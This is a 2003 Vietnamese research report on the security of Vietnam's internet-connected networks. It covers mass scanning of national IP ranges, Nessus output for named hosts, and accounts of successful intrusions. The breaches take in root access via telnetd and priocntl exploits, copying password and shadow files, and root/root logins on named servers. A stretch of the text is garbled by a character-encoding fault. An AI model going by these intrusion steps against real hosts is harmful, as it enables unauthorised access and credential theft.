Đề tài Hỗ trợ bảo mật hệ thống thông tin cho các mạng tin học Việt Nam

Tài liệu Đề tài Hỗ trợ bảo mật hệ thống thông tin cho các mạng tin học Việt Nam: Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 1 THÀNH PHỐ HỒ CHÍ MINH Tháng 12 năm 2003 ĐỀ TÀI NGHIÊN CỨU ỨNG DỤNG HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN CHO CÁC MẠNG TIN HỌC VIỆT NAM Báo cáo tổng quan Chủ nhiệm đề tài: Trịnh Ngọc Minh Cơ quan quản lý: Sở Khoa học và Công nghệ Cơ quan chủ trì: Trung tâm Phát triển Công nghệ thông tin – ĐHQG-HCM Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 2 BÁO CÁO TỔNG KẾT ĐỀ TÀI NGHIÊN CỨU “HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN CHO CÁC MẠNG TIN HỌC VIỆT NAM” Thành phố Hồ Chí Minh ngày 9/12/2003 Thực hiện đề tài KS Phạm Hòang Bảo SaigonCTT CN Ngô Thư Chí Sao Bắc Đẩu KS Nguyễn Như Hảo ĐHQG-HCM CN Trương Thế Khôi SaigonCTT TS Trịnh Ngọc Minh ĐHQG-HCM CN Võ Hồng Minh Saigonctt CN Thái Nguyễn Hòang Nhã Cisco Việt nam CN Lê Minh Quốc SaigonCTT CN Nguyễn Hòang Sang SaigonCTT CN Nguyễn Kim Trang SaigonCTT SV Nguyễn Anh Tú SaigonCTT CN Đỗ Mạnh Ti...

pdf163 trang | Chia sẻ: hunglv | Lượt xem: 1735 | Lượt tải: 0download
Bạn đang xem trước 20 trang mẫu tài liệu Đề tài Hỗ trợ bảo mật hệ thống thông tin cho các mạng tin học Việt Nam, để tải tài liệu gốc về máy bạn click vào nút DOWNLOAD ở trên
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 1 THÀNH PHỐ HỒ CHÍ MINH Tháng 12 năm 2003 ĐỀ TÀI NGHIÊN CỨU ỨNG DỤNG HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN CHO CÁC MẠNG TIN HỌC VIỆT NAM Báo cáo tổng quan Chủ nhiệm đề tài: Trịnh Ngọc Minh Cơ quan quản lý: Sở Khoa học và Công nghệ Cơ quan chủ trì: Trung tâm Phát triển Công nghệ thông tin – ĐHQG-HCM Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 2 BÁO CÁO TỔNG KẾT ĐỀ TÀI NGHIÊN CỨU “HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN CHO CÁC MẠNG TIN HỌC VIỆT NAM” Thành phố Hồ Chí Minh ngày 9/12/2003 Thực hiện đề tài KS Phạm Hòang Bảo SaigonCTT CN Ngô Thư Chí Sao Bắc Đẩu KS Nguyễn Như Hảo ĐHQG-HCM CN Trương Thế Khôi SaigonCTT TS Trịnh Ngọc Minh ĐHQG-HCM CN Võ Hồng Minh Saigonctt CN Thái Nguyễn Hòang Nhã Cisco Việt nam CN Lê Minh Quốc SaigonCTT CN Nguyễn Hòang Sang SaigonCTT CN Nguyễn Kim Trang SaigonCTT SV Nguyễn Anh Tú SaigonCTT CN Đỗ Mạnh Tiến SaigonCTT Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 3 1 Hòan cảnh hình thành đề tài Cuối năm 1999, web site của ĐHQG-HCM bị cracker từ nước ngòai thay đổi bằng một nội dung phản động ! Đây là hồi chuông cảnh báo đầu tiên về khả năng bị tấn công từ ngòai vào mạng ĐHQG-HCM và giúp chúng ta cảnh tỉnh về trình độ còn rất non yếu của nhóm quản trị mạng ĐHQG-HCM về vấn để bảo mật hệ thống. Sớm nắm được mối hiểm nguy khi kết nối vào Internet và nhận thấy sự cần thiết phải nâng cao trình độ của cán bộ quản trị mạng, Lãnh đạo ĐHQG-HCM đã phê duyệt đề tài nghiên cứu trọng điểm cấp ĐHQG về “An tòan và bảo mật hệ thống thông tin”. Nội dung chính của đề tài là tìm hiểu các phương thức xâm nhập hệ thống của các hacker/cracker nhằm nâng cao trình độ quản trị mạng và tăng cường khả năng bảo mật cho các máy chủ. Ñeà taøi ñaõ ñöôïc trieån khai trong hôn moät naêm vaø ñöôïc nghieäm thu cuoái naêm 2001 vôùi keát quaû toát. Noäi dung chính cuûa ñeà taøi laø tìm hieåu caùc phöông thöùc xaâm nhaäp moät heä thoáng tin hoïc vaø ñeà ra moät soá phöông phaùp phoøng choáng nhö qui trình xaây döïng maùy chuû an toaøn, moät soá phöông phaùp phaùt hieän backdoor … Ñeà taøi cuûa ÑHQG chính laø böôùc chuaån bò kyõ thuaät cho pheùp trieån khai ñeà taøi ñang ñöôïc ñeà caäp. Vôùi nhöõng kieán thöùc, kyõ naêng veà tìm hieåu caùc sô hôû cuûa heä thoáng tích luõy töø ñeà taøi cuûa ÑHQG-HCM, chuùng ta coù theå tìm ra caùc sô hôû cuûa caùc maïng tin hoïc thoâng qua Internet, caûnh baùo caùc nhaø quaûn trò maïng thoâng qua caùc thoâng tin “naëng kyù” nhö thoâng baùo sô hôû vôùi nhöõng baèng chöùng nhö password cuûa admin, thoâng tin taøi khoaûn caù nhaân, khaû naêng thay ñoåi noäi dung Website … Töï bieát maïng tin hoïc cuûa mình sô hôû vaø töï söûa chöõa laø moät ñieàu raát khoù khaên. Vôùi hôn moät naêm nghieân cöùu vaán ñeà baûo maät heä thoáng cuûa moät soá maïng tin hoïc cuûa Vieät nam, keå caû caùc maïng ISP chuyeân nghieäp nhö VDC, FPT, SaigonNet, Netnam … chuùng toâi nhaän thaáy heä thoáng maïng cuûa chuùng ta coøn nhieàu sô hôû. Tuy nhieân bieát ñöôïc heä thoáng maïng cuûa mình bò taán coâng hoaëc ñaõ bò xaâm nhaäp laø moät vaán ñeà khoù khaên, thaäm trí nhieàu khi raát khoù khaên. Coù hai nguyeân nhaân chính gaây neân khoù khaên treân. Tröôùc tieân laø vaán ñeà kyõ thuaät, caùc xaâm nhaäp raát ña daïng, phong phuù vaø thay ñoåi nhanh do tieán boä khoâng ngöøng cuûa kyõ thuaät. Sau ñoù laø trình ñoä kyõ thuaät, yù thöùc veà nguy cô cuûa caùn boä quaûn trò heä thoáng ña phaàn coøn thaáp. Cuõng phaûi nhaän thaáy raèng baûo ñaûm moät heä thoáng phöùc taïp, nhieàu döõ lieäu quan troïng laø moät coâng taùc meät nhoïc vaø khoù khaên. Ngöôøi quaûn trò phaûi ñoïc nhieàu thoâng tin thoâng qua caùc taäp tin log, kieåm tra tính toaøn veïn caùc tieän ích quan troïng, theo doõi thoâng tin treân Internet, tham gia caùc forum veà security vaø xöû lyù caùc thoâng tin, thöôøng xuyeân naâng caáp caùc phaàn meàm vaù loã thuûng baûo maät, löu tröõ (backup) moät caùch heä thoáng… Coâng cuï hoã trôï thöïc söï laø caàn thieát ñoái vôùi coâng taùc naøy. Caàn thieát coù söï hoã trôï hoaøn toaøn mieãn phí vaø hieäu quaû cuûa Nhaø nöôùc ñoái vôùi caùc maïng tin hoïc coâng cuõng nhö tö nhaân. Hieän taïi chuùng ta cuõng ñaõ coù moät soá trung taâm hoaït ñoäng trong lónh vöïc naøy nhö VISC, trung taâm baûo maät heä thoáng Ñaïi hoïc Baùch khoa Haø noäi... Tuy nhieân thöïc teá cho thaáy ít ñôn vò naøo töï boû ra chi phí ñeå “nhôø” ñôn vò ngoaøi Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 4 xem laïi heä thoáng maïng cuûa mình khi chöùa thaáy hoaëc khoâng bieát maïng cuûa mình bò taán coâng. Vì vaäy söï hoã trôï mieãn phí ñeå caûnh baùo caùc maïng tin hoïc vaø trôï giuùp quyeát ñònh ñaàu tö saâu hôn laø thöïc söï caàn thieát. Ñaàu tö giuùp caùc ñôn vò tìm ra ñieåm yeáu cuûa mình laø hoã trôï thieát thöïc cho phaùt trieån ngaønh CNTT cuûa nöôùc ta. Nhöõng nhaø quaûn trò maïng caàn coù coâng cuï hoã trôï hieäu quaû cho pheùp phaùt hieän caùc xaâm nhaäp hoaëc yù ñònh xaâm nhaäp töø ngoaøi. Nhö ñaõ ñeà caäp ôû treân, phaùt hieän xaâm nhaäp laø moät baøi toaùn khoù vaø chuùng ta caàn coù nhöõng coâng cuï maïnh nhö heä thoáng phaùt hieän xaâm nhaäp Intrusion Detection System (IDS). Thöïc ra ñaây laø hoï goàm nhieàu caùc coâng cuï phaàn cöùng vaø phaàn meàm khaùc nhau. Nhoùm nghieân cöùu ñaõ tìm hieåu taøi lieäu, trieån khai thöû nghieäm, so saùnh tính naêng caùc heä thoáng khaùc nhau vaø ñöa ra caùc khuyeán caùo laø caàn thieát. 2 Mục tiêu của đề tài Với các phân tích như ở trên, mục tiêu chính của đề tài nhằm vào các vấn đề sau: a/ Tìm ra caùc sô sôû cuûa caùc maïng vôùi keát noái tröïc tieáp Internet cuûa Vieät nam b/ Thoâng baùo cho caùc maïng tin hoïc coù sô hôû loãi cuøng vôùi caùc minh chöùng. Cung caáp caùc phöông thöùc söûa chöõa nhö download giuùp caùc phaàn meàm vaù loãi, hoaëc chæ daãn caùc caáu hình söûa chöõa. Kieåm tra loãi sau khi ñaõ söûa chöõa. c/ Xaây döïng website vôùi möùc ñoä baûo maät cao. Coâng boá moâ hình Website vaø phöông thöùc xaây döïng cho pheùp caùc ñôn vò ñöôïc trieån khai mieãn phí d/ Nghieân cöùu so saùnh caùc coâng ngheä IDS cöùng vaø meàm. Ñöa ra caùc khuyeán caùo. 3 Các nội dung chính của đề tài a/ Khaûo saùt hieän traïng. Phaàn khaûo saùt hieän traïng seõ goàm 2 phaàn. Phaàn 1: Thu thaäp thoâng tin veà taát caû caùc maïng tin hoïc cuûa Vieät nam. Maïng tin hoïc Vieät nam laø nhöõng maïng tin hoïc maø ñieåm keát noái cuûa noù naèm sau caùc coång gateway cuûa Vieät nam. Noùi moät caùch kyõ thuaät, ñoù laø nhöõng maïng söû duïng heä thoáng ñòa chæ IP cuûa Internic caáp phaùt cho Vieät nam. Do ñoù, nhöõng maïng tin hoïc coù teân mieàn khoâng keát thuùc baèng .vn nhöõng ñöôïc truy caäp thoâng qua caùc IP cuûa Vieätnam seõ laø caùc ñoái töôïng nghieân cöùu. Caùc thoâng tin thu thaäp seõ bao goàm danh saùch caùc dòch vuï maø maïng ñoù cung caáp ra ngoaøi, caùc ñaëc ñieåm chuyeân bieät cuûa caùc dòch vuï, heä thoáng maùy chuû vaø caùc phaàn meàm töông öùng, caùc thieát bò maïng, ñaëc bieät laø caùc thieát bò lieân qua tôùi baûo maät. Caùc thoâng tin naøy seõ ñöôïc thu thaäp töø nhieàu nguoàn khaùc nhau nhö duøng coâng cuï khaûo saùt maïng, tra thoâng tin DNS, tra thoâng tin treân trang Web … Phaàn 2: Thu thaäp thoâng tin veà caùc sô hôû cuûa maïng cuøng caùc kyõ thuaät xaâm nhaäp môùi. Nhoùm nghieân cöùu caàn ñöôïc caäp nhaät caùc kieán thöùc veà caùc phieân baûn heä ñieàu haønh môùi Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 5 nhö Solaris 9, RedHat Linux 8, Windows Xp … cuøng vôùi caùc thoâng tin lieân quan tôùi caùc sô hôû môùi ñöôïc phaùt hieän. Caùc kyõ thuaät xaâm nhaäp quan troïng caàn ñöôïc trieån khai thöû nghieäm taïi caùc maïng tin hoïc maø nhoùm nghieân cöùu ñang laøm vieäc ñeå coù theå naém vöõng caùc kyõ thuaät naøy. Caùc phieân baûn môùi cuûa heä ñieàu haønh, cuûa trình dòch vuï … caàn ñöôïc caøi ñaët cho coâng taùc thöû nghieäm. Ngoaøi ra, nhoùm nghieân cöùu caàn phaân coâng nhau ñaêng kyù vaøo caùc forum chuyeân ngaønh, xöû lyù thoâng tin treân ñoù vaø tìm ra nhöõng thoâng tin môùi nhaát. b/ Xaây döïng Web site. Xaây döïng moät Website chuyeân bieät ñeå phuïc vuï ñeà taøi. Caùc kieán thöùc, coâng ngheä môùi nhaát veà baûo maät moät website seõ ñöôïc trieån khai. Heä thoáng coång thoâng tin iPortal, phöông thöïc xaùc thöïc LDAP, Radius, phöông thöùc keát noái an toaøn giöõa maùy chuû döõ lieäu vaø maùy chuû Web, caùc tieän ích phaùt hieän xaâm nhaäp … seõ ñöôïc trieån khai ñeå coù ñöôïc moät Web site an toaøn nhaát. Website naøy seõ laø ñoái töôïng ñaàu tieân vaø quan troïng nhaát cuûa nhoùm nghieân cöùu taán coâng thöû nghieäm. Ngoaøi ra, nhoùm nghieân cöùu seõ môøi roäng raõi nhöõng ngöôøi quan taâm tôùi baûo veä heä thoáng tin hoïc taán coâng thöû nghieäm Website naøy. c/ Nghieân cöùu vaø trieån khai thöû nghieäm IDS Hai coâng ngheä ñaõ ñöôïc nhoùm ñeà taøi nghieân cöùu laø thieát bò IDS cuûa haõng Cisco vaø phaàn meàm snort treân heä ñieàu haønh Linux hoaëc Sun Solaris. Caùc thieát bò/phaàn meàm naøy ñaõ ñöôïc trieån khai trong cuøng moät heä thoáng maïng vôùi Website bugsearch cuûa ñeà taøi nhaèm xem xeùt khaû naêng phaùt hieän xaâm nhaäp thöïc teá cuõng nhö xaâm nhaäp thöû nghieäm cuûa baûn thaân nhoùm ñeà taøi. Trong quaù trình trieån khai treân thöïc teá, nhoùm döï aùn ñaõ xem xeùt theâm Internet Security System – ISS. Ñaây laø moät saûn phaåm IDS raát maïnh, ñaày ñuû cuûa haõng Nokia, ñaõ ñöôïc böu ñieän Haø noäi vaø böu ñieän Tp HCM trieån khai cho 2 Trung taâm cung caáp dòch vuï Internet môùi cuûa mình. d/ Doø tìm sô hôû maïng Sau khi thöïc hieän thu thaäp thoâng tin thoâng qua khaûo saùt hieän traïng, nhoùm nghieân cöùu ñaõ trieån khai coâng taùc doø tìm caùc sô hôû. Coâng taùc tìm sô hôû phaûi thoûa maõn caùc tieâu chí sau: • Khoâng ñöôïc gaây baát cöù moät söï roái loaïn naøo, duø nhoû, trong hoaät ñoäng bình thöôøng cuûa maïng. • Khoâng ñöôïc laáy, söû duïng baát kyø baát kyø döõ lieäu naøo cuûa maïng nghieân cöùu • Caùc baèng chöùng veà sô hôû coù tính thuyeát phuïc cao, ñaëc bieät coù tính nghieâm troïng cuûa haäu quaû neáu bò xaâm nhaäp cho pheùp phuï traùch kyõ thuaät cuûa caùc heä thoáng maïng coù theå thuyeát phuïc laõnh ñaïo veà caùc ñaàu tö nhaèm taêng cöôøng an ninh cuûa maïng tin hoïc cuûa mình. • Trong tröôøng hôïp maïng ñaõ coù sô hôû, tìm kieám caùc backdoor coù theå coù do caùc cracker ñaõ laøm tröôùc ñoù. Ñaây laø moät noäi dung coù taàm quan troïng ñaëc bieät vì neáu maïng ñaõ coù sô hôû thì vôùi xaùc suaát cao laø maïng ñaõ bò xaâm nhaäp vaø bò caøi Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 6 backdoor. Caùc backdoor ñoù coù theå ñöôïc che daáu tính vi vaø thöïc söï nguy hieåm neáu khoâng phaùt hieän ñöôïc chuùng. Vôùi nhieàu heä thoáng, moät khi moät maùy coù backdoor thì taát caû caùc thieát bò, phaàn meàm baûo maät ñaét tieàn khaùc cuûa heä thoáng seõ bò voâ hieäu hoùa. e/ Nghieân cöùu caùc phöông phaùp baûo veä vaø ñaùnh giaù hieäu quaû. Sau khi phaùt hieän caùc sô hôû, ñaùnh giaù möùc ñoä nguy hieåm cuûa töøng sô hôû, nhoùm nghieân cöùu seõ xem xeùt caùc phöông thöùc baûo veä. Caùc giaûi phaùp baûo veä khaùc phuïc sô hôû seõ ñöôïc thoâng baùo chi tieát tôùi caùc maïng tin hoïc coù vaán ñeà. Trong khaû naêng cho pheùp, nhoùm nghieân cöùu seõ taûi veà vaø chuyeån giao caùc phaàn meàm caàn thieát cho ñoái töôïng nghieân cöùu cuøng vôùi caùc khuyeán caùo. f/ Ñaøo taïo vaø chuyeån giao coâng ngheä. Nhoùm nghieân cöùu seõ toå chöùc moät moät hoäi thaûo roäng raõi cho khoaûng 50 laõnh ñaïo vaø chuyeân vieân IT vaø moät lôùp taäp huaán cho 20 quaûn trò vieân maïng tin hoïc, ñaëc bieät laø cho caùc coâng ty ñaõ phoái hôïp chaët cheõ vôùi nhoùm nghieân cöùu, nhaèm naâng cao trình ñoä baûo veä heä thoáng cuûa caùc caùn boä quaûn trò maïng. Chi phí cuûa caùc hoaït ñoäng naøy ñaõ ñöôïc döï truø trong kinh phí cuûa ñeà taøi. 4 Các kết quả nghiên cứu đạt được 4.1 Khảo sát hệ thống địa chỉ IP cùng tên miền của các máy tính nối mạng Internet của Việt nam 4.1.1 Phương pháp khảo sát Lấy danh sách các tên miền của Việt nam. Hiện nay, các máy chủ tên miền của Việt nam không cho phép thực hiện chức năng list cho phép xem các record của tên miền. Vì vậy, nhóm triển khai phải sử dụng các nguồn thông tin thu thập từ nhiều nguồn khác nhau và được một danh sách như trong bảng sau. Phương pháp tiếp theo để thu thập các địa chỉ IP của Việt nam là thông qua các thông tin của Internic về các AS đã phân bổ cho Việt nam. Sử dụng thông tin này, chúng ta có được thông tin chính xác về các địa chỉ IP của Việt nam, nhưng sử dụng các địa chỉ này gặp khó khăn lớn là có rất nhiều địa chỉ chưa sử dụng và việc quét hết danh sách này tốn rất nhiều thời gian và đường truyền. Thêm nữa đa phần các địa chỉ IP của chúng ta không có phân giải ngược IP về tên miền nên nhiều khi nhóm dự án phát hiện sơ hở của máy chủ nhưng không xác định được máy chủ thuộc đơn vị/công ty nào. Nhóm dự án xây dựng một chương trình ngắn để phân giải ngược tự động các địa chỉ IP của Việt nam. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 7 4.1.2 Kết quả thực hiện được • Xác định rõ các địa chỉ IP của các mạng tin học Việt nam • Tổ chức “quét” (scan) số lượng lớn các địa chỉ IP của Việt nam nhằm tìm ra các sơ hở dựa trên các lỗi đã được công bố trên Internet. Đặc biệt, chúng tôi có quan tâm đặc biệt tới các địa chỉ của các mạng quan trọng như Webcity, VDC, SaigonNet, Netnam … Các kết quả trên được trình bày cụ thể trong các phần sau. 4.2 Tìm hiểu các dịch vụ triển khai trên các máy chủ của các mạng tin học Việt nam, Cơ sở dữ liệu các địa chỉ IP cùng với các thông tin về dịch vụ đang mở trên từng IP là rất quan trọng, cho phép chúng ta nhanh chóng xác định khả năng bị xâm nhập đối với một máy tính. Giả sử ta có được thông tin từ Internet về một kiểu sơ hở, ta có thể tìm trong cơ sở dữ liệu này địa chỉ IP có sơ hở tương ứng và nhanh chóng tiến hành xâm nhập thử nghiệm xem có thể hiện thực hóa xâm nhập được hay không. Theo thông tin từ APNIC, tổ chức quản lý Internet tại châu Á, Việt nam chúng ta có 3 vùng AS (Autonomous System) ( và khỏang 83456 IP Việc “quét” tòan bộ tất cả các IP trên là một công việc lớn và làm ảnh hưởng nhiều tới mạng của máy đi quét cũng như máy bị quét. Nhóm nghiên cứu đã phải tực hiện chủ yếu các thao tác này vào nghỉ cuối tuần và ban đêm. Chiến lược “quét” của chúng tôi là dò tìm tất cả các port trên một số mạng quan trọng, các IP quen biết và dò tìm một số cổng dịch vụ phổ biến cho các IP khác. Cụ thể là công tác dò tìm các port cơ bản được thực hiện cho „ 203.113.128.0 (8192) „ 203.160.0.0 (512) „ 203.161.0.0 (1024) „ 203.162.0.0 (4096) apnic VN asn 18403 1 20030103 allocated apnic VN asn 7552 1 20021008 allocated apnic VN asn 7643 1 19971014 allocated apnic VN ipv4 203.113.128.0 8192 20020904 allocated apnic VN ipv4 203.160.0.0 512 19940923 assigned apnic VN ipv4 203.161.0.0 1024 19950308 allocated apnic VN ipv4 203.162.0.0 2048 19950809 allocated apnic VN ipv4 203.162.128.0 4096 20010718 allocated apnic VN ipv4 203.162.144.0 4096 20021105 allocated apnic VN ipv4 203.162.16.0 4096 19981123 allocated apnic VN ipv4 203.162.160.0 8192 20021105 allocated apnic VN ipv4 203.162.32.0 8192 19981123 allocated apnic VN ipv4 203.162.64.0 16384 20010718 allocated apnic VN ipv4 203.162.8.0 2048 19981102 allocated apnic VN ipv4 203.210.128.0 16384 20021105 allocated apnic VN ipv4 210.245.0.0 8192 20020806 allocated Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 8 „ 203.162.16.0 (12288) „ 203.162.64.0 (32768) „ 203.210.128.0 (16384) „ 210.245.0.0 (8192) Tỷ lệ IP đã scan được khỏang 80 % của tòan bộ vùng IP trên. Dò tìm rộng các port từ 1 đến 65535 cho các vùng IP „ 203.162.0.0(4096) „ 203.162.17.0/24 „ 203.162.53.0/24 „ 203.162.57.0/24 „ 203.162.97.0/24 „ 203.113.131.0/24 Tỉ lệ IP đã scan của vùng này 11.35% Cùng với dò tìm các sơ hở một cách đại trà trên mạng, nhòm nghiên cứu cũng đã thực hiện việc phân giải tên của các IP để biết chủ sở hữu của các IP. Với một phần mềm nhỏ, nhóm nghiên cứu đã thử cho tất cả các địa chỉ IP nhưng chi phân giải được 783 địa chỉ, chiếm 0,94 %. Nguyên nhân của kết quả này là rất nhiều địa chỉ IP chưa sử dụng, địa chỉ IP dùng cho kết nối động qua dial-up, ADSL; IP dùng cho kết nối routers; và rất nhiều tên miền không có phân giải ngược IP-> tên trong Cơ sở dữ liệu DNS. Phụ lục B sao trính một phần các địa chỉ IP có tên miền tương ứng. Các tiện ích được sử dụng để tiến hành thăm dò các dịch vụ đang họat động trên một máy chủ là • Trên Windows: SuperScan (thích hợp khi cần scan nhanh) • Trên Unix: nmap, nessus Kết quả thăm dò các mạng khá dài (trên 2000 trang), do đó nhóm đề tài chỉ xin trích đoạn một số kết quả làm ví dụ: 203.113.142.14 Service Severity Description telnet (23/tcp) Info Port is open general/udp Low For your information, here is the traceroute to 203.113.142.14 : 192.168.20.2 192.168.20.2 192.168.20.2 203.113.142.14 telnet (23/tcp) Low An unknown service is running on this port. It is usually reserved for Telnet telnet (23/tcp) Low Remote telnet banner : User Access Verification Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 9 Password: general/tcp Low The remote host uses non-random IP IDs, that is, it is possible to predict the next value of the ip_id field of the ip packets sent by this host. An attacker may use this feature to determine if the remote host sent a packet in reply to another request. This may be used for portscanning and other things. Solution : Contact your vendor for a patch Risk factor : Low general/tcp Low The remote host does not discard TCP SYN packets which have the FIN flag set. Depending on the kind of firewall you are using, an attacker may use this flaw to bypass its rules. See also : Solution : Contact your vendor for a patch Risk factor : Medium BID : 7487 general/tcp Low Remote OS guess : Cisco 801/1720 running 12.2.8 CVE : CAN-1999-0454 telnet (23/tcp) Low The Telnet service is running. This service is dangerous in the sense that it is not ciphered - that is, everyone can sniff the data that passes between the telnet client and the telnet server. This includes logins and passwords. You should disable this service and use OpenSSH instead. (www.openssh.com) Solution : Comment out the 'telnet' line in /etc/inetd.conf. Risk factor : Low Page 7 Network Vulnerability Assessment Report 05.08.2003 CVE : CAN-1999-0619 203.113.142.2 Service Severity Description telnet (23/tcp) Info Port is open telnet (23/tcp) Low The Telnet service is running. This service is dangerous in the sense that it is not ciphered - that is, everyone can sniff the data that passes between the telnet client and the telnet server. This includes logins and passwords. You should disable this service and use OpenSSH instead. (www.openssh.com) Solution : Comment out the 'telnet' line in /etc/inetd.conf. Risk factor : Low CVE : CAN-1999-0619 general/tcp Low The remote host does not discard TCP SYN packets which Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 10 have the FIN flag set. Depending on the kind of firewall you are using, an attacker may use this flaw to bypass its rules. See also : Solution : Contact your vendor for a patch Risk factor : Medium BID : 7487 general/udp Low For your information, here is the traceroute to 203.113.142.2 : 192.168.20.2 192.168.20.2 192.168.20.2 192.168.20.2 ? 192.168.20.2 192.168.20.2 192.168.20.2 203.113.142.2 general/tcp Low The remote host uses non-random IP IDs, that is, it is possible to predict the next value of the ip_id field of the ip packets sent by this host. Page 8 Network Vulnerability Assessment Report 05.08.2003 An attacker may use this feature to determine if the remote host sent a packet in reply to another request. This may be used for portscanning and other things. Solution : Contact your vendor for a patch Risk factor : Low general/tcp Low Remote OS guess : Cisco X.25/TCP/LAT Protocol Translator ver 8.2(4) CVE : CAN-1999-0454 203.113.142.30 Service Severity Description telnet (23/tcp) Info Port is open telnet (23/tcp) Low The Telnet service is running. This service is dangerous in the sense that it is not ciphered - that is, everyone can sniff the data that passes between the telnet client and the telnet server. This includes logins and passwords. You should disable this service and use OpenSSH instead. (www.openssh.com) Solution : Comment out the 'telnet' line in /etc/inetd.conf. Risk factor : Low Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 11 CVE : CAN-1999-0619 general/tcp Low The remote host uses non-random IP IDs, that is, it is possible to predict the next value of the ip_id field of the ip packets sent by this host. An attacker may use this feature to determine if the remote host sent a packet in reply to another request. This may be used for portscanning and other things. Solution : Contact your vendor for a patch Risk factor : Low general/udp Low For your information, here is the traceroute to 203.113.142.30 : 192.168.20.2 192.168.20.2 203.113.142.30 telnet (23/tcp) Low A telnet server seems to be running on this port general/tcp Low Remote OS guess : Cisco 3600 running IOS 12.2(6c) CVE : CAN-1999-0454 Page 10 Network Vulnerability Assessment Report 05.08.2003 telnet (23/tcp) Low Remote telnet banner : User Access Verification Username: general/tcp Low The remote host does not discard TCP SYN packets which have the FIN flag set. Depending on the kind of firewall you are using, an attacker may use this flaw to bypass its rules. See also : Solution : Contact your vendor for a patch Risk factor : Medium BID : 7487 (Ngắt trích đọan ở đây …) 4.3 Các sai sót tìm thấy và có thể bị khai thác tại mạng tin học Việt nam Sau khi “quét” một cách hệ thống các địa chỉ IP của Việt nam và biết được các dịch vụ mà các máy tính đang sử dụng, nhóm đề tài lựa chọn và xâm nhập thử nghiệm các máy tính này. Kết quả thử nghiệm được trình bày ở phần sau. Với mỗi máy bị xâm nhập, chúng tôi cố gắng xác định chủ nhân của máy, miêu tả hệ điều hành, các lỗi mà qua đó ta có thể xâm nhập hệ thống và một số sao chép từ màn hình minh họa cho xâm nhập thành công của nhóm đề tài. Các màn hình minh học dạng copy màn hình khôg được in ở đây Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 12 vì quá dài. Nhóm dự án sẽ kèm theo những tập tin trên đĩa CDROM để minh họa khi cần thiết. Các thông tin liên quan tới sơ hở, đọan chương trình cho phép khai thác sơ hở (exploit code) được nhóm nghiên cứu tra cứu chủ yếu ở các website sau : 1) 203.162.57.227 (Suntest.vnnic.net) a. Hệ điều hành: Solaris 8 b. Hostname: Suntest c. Lỗi remote: i. Telnetd exploit trên Solaris cho các version 2.6, 2.7, 2.8 ii. Exploit code đã được công bố trên internet khá lâu iii. Dùng exploit code trên máy Linux từ xa có thể chiếm được shell với quyền của user bin d. Lỗi local i. priocntl exploit trên Solaris với cấu trúc lệnh 64 bit ii. Lỗi này cũng đã được thông báo trên internet iii. Khai thác thành công đem lại root shell iv. Kết quả: 1. tạo file /etc/.bugsearch 2. copy file /etc/passwd, /etc/shadow ( Exploit code, /etc/passwd,/etc/shadow và màn hình copy đính kèm ). 2) 203.162.53.51 ( Stelecom) Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 13 a. Hệ điều hành: Solaris 6.0 b. Hostname: hrl (local hostname), local IP # /usr/sbin/ifconfig -a lo0: flags=849 mtu 8232 inet 127.0.0.1 netmask ff000000 pnet0: flags=863 mtu 1500 inet 10.1.11.11 netmask ffffff00 broadcast 10.1.11.255 ether 8:0:20:a5:d7:82 pnet1: flags=863 mtu 1500 inet 10.1.11.14 netmask ffffff00 broadcast 10.1.11.255 ether 8:0:20:a5:d7:83 c. Lỗi remote: Telnetd, mật khẩu yếu - Xâm nhập thành công qua 2 user: hrl và oms, user root không login từ xa được. - Có thể khai thác lỗi của telnetd và chiếm được remote shell dưới quyền user bin d. Lỗi local - Thử su và dò thành công password root - Có thể khai thác lỗi local xlock overflow e. Các server lân cận bị khai thác i. oms1.lgic.co.kr (10.1.11.12) 1. hostname: oms1 2. local IP: 10.1.11.12 3. hệ điều hành: Solaris 7 oms1# /usr/sbin/ifconfig -a lo0: flags=849 mtu 8232 inet 127.0.0.1 netmask ff000000 hme0: flags=863 mtu 1500 inet 10.1.11.12 netmask ffff0000 broadcast 10.1.255.255 ether 0:3:ba:9:3a:a2 oms1# Từ máy hrl chỉ cần telnet sang máy oms1 với user root, passwd root: # telnet oms1.lgic.co.kr Trying 10.1.11.12... Connected to oms1.lgic.co.kr. Escape character is '^]'. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 14 SunOS 5.7 welcome to oms1 don't work other jobs login: root Password: Sun Microsystems Inc. SunOS 5.7 Generic October 1998 You have new mail. oms1# w 1:15pm up 103 day(s), 2:48, 2 users, load average: 0.02, 0.02, 0.02 User tty login@ idle JCPU PCPU what oms console 20Jun03103days /usr/dt/bin/sdt_shell -c unseten oms pts/3 16Sep0315days /bin/csh oms pts/7 Sun 7pm 27:55 telnet hlr oms pts/8 9:42am 3:14 telnet hlr root pts/9 1:15pm w oms1# ii. oms2.lgic.co.kr (10.1.11.13) 1. hệ điều hành: Solaris 7 2. Local IP: 10.1.11.13 Từ máy hrl hay oms1 chỉ cần telnet đến oms2 với user root, passwd root là 